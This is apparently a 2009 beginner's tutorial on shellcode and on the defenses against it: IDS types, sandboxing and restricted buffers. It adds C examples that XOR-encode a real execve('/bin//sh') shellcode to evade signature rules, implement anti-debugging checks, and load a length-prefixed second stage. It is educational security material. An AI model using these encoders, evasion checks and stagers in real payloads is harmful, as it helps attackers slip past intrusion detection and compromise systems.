Friday, September 4, 2009

SHELLCODES - A QUICK REFERENCE FOR BEGINNERS

SHELLCODE :

Shellcode is a small piece of machine code used as the payload when a software bug is exploited. Once the attacker has hijacked the program's control flow, the shellcode becomes the continuation of the program: the CPU executes it as if it were the program's own code. Shellcode is commonly used when exploiting vulnerabilities such as stack overflows, heap overflows, integer and array overflows, file stream overflows and format string bugs.

Shellcode is equally useful when exploiting a local application bug. Its job is to give the attacker access to the victim's machine, typically in one of the following ways:

By spawning a local shell on the victim (/bin/sh on Unix, cmd.exe on Windows)
By binding a shell to a network port so the attacker can connect to it remotely (or connecting a shell back to the attacker)
By adding a user with root or administrator privileges to the victim's machine

DEFENSE AGAINST SHELLCODES :

To protect systems against shellcode, vendors have developed several defenses. The most common ones adopted by defenders are the following:

1) Intrusion Detection Systems: there are three main kinds:

NIDS: a network IDS captures datagrams from the live network traffic and looks for attack patterns in them. It relies on what can be called wire diagnosis:

Wire diagnosis inspects traffic in transit, before it reaches its destination.
It searches the traffic for known attack patterns (signatures).
How effective it is depends on the quality of the rule set the administrator has assembled.

A NIDS can also use a method called runtime diagnosis:

The suspicious data is executed (for example in an emulator or sandbox) and the resulting behaviour or output is assessed.
That output is checked for known attack patterns.

HIDS: a host IDS looks for attack patterns in the actions carried out by local users and processes.

AIDS: an application IDS analyzes all the input data that flows into an application.

2) Intrusion Prevention System: a sandbox that confines what the program is allowed to do.

3) Restricted buffer sizes: the protocol or application enforces fixed, limited buffer sizes, so a payload has to fit in very little space.

4) Non-standard paths: important files are moved away from their default locations. Unix variants and BSD allow the administrator to reorganize the system layout, so shellcode that hardcodes a path such as /bin/sh may not find it.
One restriction that follows from these defenses is the size limitation: the shellcode has to fit into the space the bug exposes.

HOW SHELLCODES BREAK THESE DEFENSES :

Shellcode lets the attacker execute almost anything they want; the only work is writing the code. Here are some of the techniques attackers use to get past the defenses listed in the previous section:

1) Wire diagnosis: this method is easily defeated by the following techniques:

Polymorphism, aka shellcode encoding: the payload bytes are disguised by encoding them (for instance XORing them with a key), so they no longer match any signature; a small decoder stub placed in front of the encoded bytes restores the original shellcode at run time.

Tunneling through a VPN/SSL connection: the payload travels inside an encrypted tunnel, so a sensor watching the wire sees only ciphertext and cannot inspect it.
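Both sides of this cat-and-mouse game in one program, as an added example that is not code from the original post: a toy wire-diagnosis rule set (shell path strings and a NOP sled) and a single-byte XOR encoder that picks a key so the encoded payload contains none of the bytes the exploit cannot deliver. The 23-byte Linux x86-64 execve("/bin//sh") shellcode is used purely as a byte string and is never executed; the signature rules, the bad-character list and the encoder are assumptions made for the illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Linux x86-64 execve("/bin//sh", NULL, NULL) shellcode, 23 bytes, no NUL bytes:
 *   xor rsi,rsi ; push rsi ; movabs rdi,"/bin//sh" ; push rdi ; push rsp ; pop rdi
 *   push 0x3b ; pop rax ; cdq ; syscall
 * Only its bytes are used here; nothing in this program executes it.
 */
static const uint8_t shellcode[] = {
    0x48, 0x31, 0xf6, 0x56,
    0x48, 0xbf, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x2f, 0x73, 0x68,
    0x57, 0x54, 0x5f, 0x6a, 0x3b, 0x58, 0x99, 0x0f, 0x05
};

/* Bytes the exploit cannot deliver (constructed list: C-string terminator, LF, CR). */
static const uint8_t bad_chars[] = { 0x00, 0x0a, 0x0d };

/* Buffers filled by build_payload(). */
static uint8_t encoded[sizeof shellcode];
static uint8_t decoded[sizeof shellcode];

/* Toy "wire diagnosis" rule set: a shell path string, or a NOP sled of 8+ bytes. */
int matches_signature(const uint8_t *buf, size_t len)
{
    static const char *strings[] = { "/bin/sh", "/bin//sh" };
    for (size_t s = 0; s < sizeof strings / sizeof strings[0]; s++) {
        size_t slen = strlen(strings[s]);
        for (size_t i = 0; i + slen <= len; i++)
            if (memcmp(buf + i, strings[s], slen) == 0)
                return 1;
    }
    size_t run = 0;
    for (size_t i = 0; i < len; i++) {
        run = (buf[i] == 0x90) ? run + 1 : 0;
        if (run >= 8)
            return 1;
    }
    return 0;
}

int has_bad_char(const uint8_t *buf, size_t len, const uint8_t *bad, size_t nbad)
{
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < nbad; j++)
            if (buf[i] == bad[j])
                return 1;
    return 0;
}

/* Smallest single-byte XOR key such that neither the ciphertext nor the key itself
 * (which the decoder stub has to carry) contains a bad character. -1 if none. */
int find_xor_key(const uint8_t *buf, size_t len, const uint8_t *bad, size_t nbad)
{
    for (int key = 1; key < 256; key++) {
        uint8_t k = (uint8_t)key;
        if (has_bad_char(&k, 1, bad, nbad))
            continue;
        size_t i;
        for (i = 0; i < len; i++) {
            uint8_t c = buf[i] ^ k;
            if (has_bad_char(&c, 1, bad, nbad))
                break;
        }
        if (i == len)
            return key;
    }
    return -1;
}

static void xor_bytes(const uint8_t *in, uint8_t *out, size_t len, uint8_t key)
{
    for (size_t i = 0; i < len; i++)
        out[i] = in[i] ^ key;
}

/* Encode the shellcode, then undo the encoding the way the decoder stub would at
 * run time. Returns the key used, or -1 if no usable key exists. */
int build_payload(void)
{
    int key = find_xor_key(shellcode, sizeof shellcode, bad_chars, sizeof bad_chars);
    if (key < 0)
        return -1;
    xor_bytes(shellcode, encoded, sizeof shellcode, (uint8_t)key);
    xor_bytes(encoded, decoded, sizeof encoded, (uint8_t)key);
    return key;
}

int main(void)
{
    int key = build_payload();
    printf("original matches IDS rule: %d\n", matches_signature(shellcode, sizeof shellcode));
    printf("xor key 0x%02x, encoded matches IDS rule: %d\n", key,
           matches_signature(encoded, sizeof encoded));
    for (size_t i = 0; i < sizeof encoded; i++)
        printf("\\x%02x", encoded[i]);
    printf("\nround trip ok: %d\n", memcmp(decoded, shellcode, sizeof shellcode) == 0);
    return 0;
}
```

The encoded bytes are only half of a real payload: a decoder stub that XORs them back in place has to be prepended, and that stub must itself be free of bad characters and of anything the rule set matches. Signature-based sensors answer with rules for common decoder stubs, which is why encoders are varied (polymorphism) rather than reused verbatim.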


2) Runtime diagnosis: this method is defeated by the following technique:

Anti-debugging: anti-debug tricks are built into the shellcode (for example detecting an attached tracer, or timing checks), so it behaves differently, or refuses to run, when executed under a debugger or an emulator.
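Two classic anti-debug tricks that a payload can embed to defeat runtime analysis, as an added example that is not code from the original post. It is Linux-specific (the first trick reads /proc/self/status), the sample status text is constructed, and the 50 ms timing budget is an assumption that a real payload would tune for its target.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

/* Constructed sample of /proc/<pid>/status as seen while a debugger is attached. */
static const char sample_status[] =
    "Name:\tsh\n"
    "State:\tt (tracing stop)\n"
    "Pid:\t1337\n"
    "TracerPid:\t4242\n";

/* Trick 1: the TracerPid field of /proc/self/status is non-zero while any tracer
 * (gdb, strace, a ptrace-based sandbox) is attached.
 * Returns the tracer's PID, 0 when not traced, -1 when the field is absent. */
int tracer_pid_from_status(const char *status)
{
    const char *p = strstr(status, "TracerPid:");
    if (p == NULL)
        return -1;
    return atoi(p + strlen("TracerPid:")); /* atoi skips the tab */
}

int being_debugged(void)
{
    char buf[4096];
    FILE *f = fopen("/proc/self/status", "r");
    if (f == NULL)
        return 0; /* no procfs (non-Linux): this trick gives no answer */
    size_t n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[n] = '\0';
    return tracer_pid_from_status(buf) > 0;
}

/* Trick 2: timing. Single-stepping, or a breakpoint inside the loop, makes it take
 * orders of magnitude longer than a native run. The 50 ms budget is an assumption. */
long loop_elapsed_ns(void)
{
    struct timespec a, b;
    volatile unsigned sink = 0;
    clock_gettime(CLOCK_MONOTONIC, &a);
    for (unsigned i = 0; i < 100000; i++)
        sink += i;
    clock_gettime(CLOCK_MONOTONIC, &b);
    return (b.tv_sec - a.tv_sec) * 1000000000L + (b.tv_nsec - a.tv_nsec);
}

int timing_looks_debugged(void)
{
    return loop_elapsed_ns() > 50000000L;
}

int main(void)
{
    printf("sample status -> tracer pid %d\n", tracer_pid_from_status(sample_status));
    printf("this process: TracerPid check %d, timing check %d\n",
           being_debugged(), timing_looks_debugged());
    return 0;
}
```

Real shellcode has no libc, so the same checks are done with raw syscalls (open/read on /proc/self/status, or the ptrace(PTRACE_TRACEME) call that fails when a tracer is already attached) and the timing loop with rdtsc. The defender's counter is to make the analysis environment look native: an emulator that reports TracerPid 0 and fakes the clock.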

3) Countering size limitations: the work is split into stages. A small first-stage payload that fits in the available space opens a channel (for example by reusing the connection the exploit came in on) and pulls the larger second stage through it.
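The staging idea in working form, as an added example that is not code from the original post: a first stage that reads a length-prefixed second stage from an already-open descriptor into a fresh memory mapping, and the sender that frames it. A pipe stands in for the attacker's network connection, the 600-byte second stage is constructed filler, and the 4-byte little-endian length header is an assumption made for the example. The real stager would map the buffer executable and jump to it; this program stops at verifying that the bytes arrived intact.

```c
#define _DEFAULT_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>

#define STAGE2_LEN 600 /* far more than the 64-byte buffer the first stage fits in */
#define CHUNK 64

/* Constructed stand-in for the real second stage: deterministic filler bytes. */
static void make_stage2(uint8_t *out, size_t len)
{
    for (size_t i = 0; i < len; i++)
        out[i] = (uint8_t)(i * 7 + 3);
}

/* read() until exactly len bytes have arrived; short reads are normal on sockets. */
static int read_exact(int fd, uint8_t *dst, size_t len)
{
    size_t got = 0;
    while (got < len) {
        ssize_t r = read(fd, dst + got, len - got);
        if (r <= 0)
            return -1; /* EOF or error before the stage was complete */
        got += (size_t)r;
    }
    return 0;
}

/* The first stage's job: on the already-open channel fd, read a 4-byte little-endian
 * length, map a buffer that large and pull the body in. Returns the buffer (length in
 * *len) or NULL. A real stager maps it executable and jumps to it. */
uint8_t *stage1_fetch(int fd, size_t *len)
{
    uint8_t hdr[4];
    if (read_exact(fd, hdr, sizeof hdr) < 0)
        return NULL;
    size_t n = (size_t)hdr[0] | (size_t)hdr[1] << 8 | (size_t)hdr[2] << 16 | (size_t)hdr[3] << 24;
    if (n == 0 || n > (1u << 20))
        return NULL; /* refuse absurd lengths */
    uint8_t *buf = mmap(NULL, n, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (buf == MAP_FAILED)
        return NULL;
    if (read_exact(fd, buf, n) < 0) {
        munmap(buf, n);
        return NULL;
    }
    *len = n;
    return buf;
}

/* Attacker side: length-prefix the stage and send it in small pieces. */
int send_stage(int fd, const uint8_t *stage, size_t n)
{
    uint8_t hdr[4] = { (uint8_t)n, (uint8_t)(n >> 8), (uint8_t)(n >> 16), (uint8_t)(n >> 24) };
    if (write(fd, hdr, sizeof hdr) != (ssize_t)sizeof hdr)
        return -1;
    for (size_t off = 0; off < n; off += CHUNK) {
        size_t k = (n - off < CHUNK) ? n - off : CHUNK;
        if (write(fd, stage + off, k) != (ssize_t)k)
            return -1;
    }
    return 0;
}

/* Whole exchange over a pipe standing in for the attacker's TCP connection.
 * Returns the number of stage-2 bytes received intact, or -1. */
int demo_staging(void)
{
    uint8_t stage2[STAGE2_LEN];
    int p[2];
    size_t n = 0;
    make_stage2(stage2, sizeof stage2);
    if (pipe(p) < 0)
        return -1;
    if (send_stage(p[1], stage2, sizeof stage2) < 0) /* small enough for the pipe buffer */
        return -1;
    close(p[1]);
    uint8_t *got = stage1_fetch(p[0], &n);
    close(p[0]);
    if (got == NULL)
        return -1;
    int ok = (n == sizeof stage2 && memcmp(got, stage2, n) == 0);
    munmap(got, n);
    return ok ? (int)n : -1;
}

int main(void)
{
    printf("stage 2 received: %d bytes\n", demo_staging());
    return 0;
}
```

The point of the split is that only stage1_fetch has to survive the size limit and the bad-character filter; the second stage can be as large as the attacker likes, because it never passes through the vulnerable buffer.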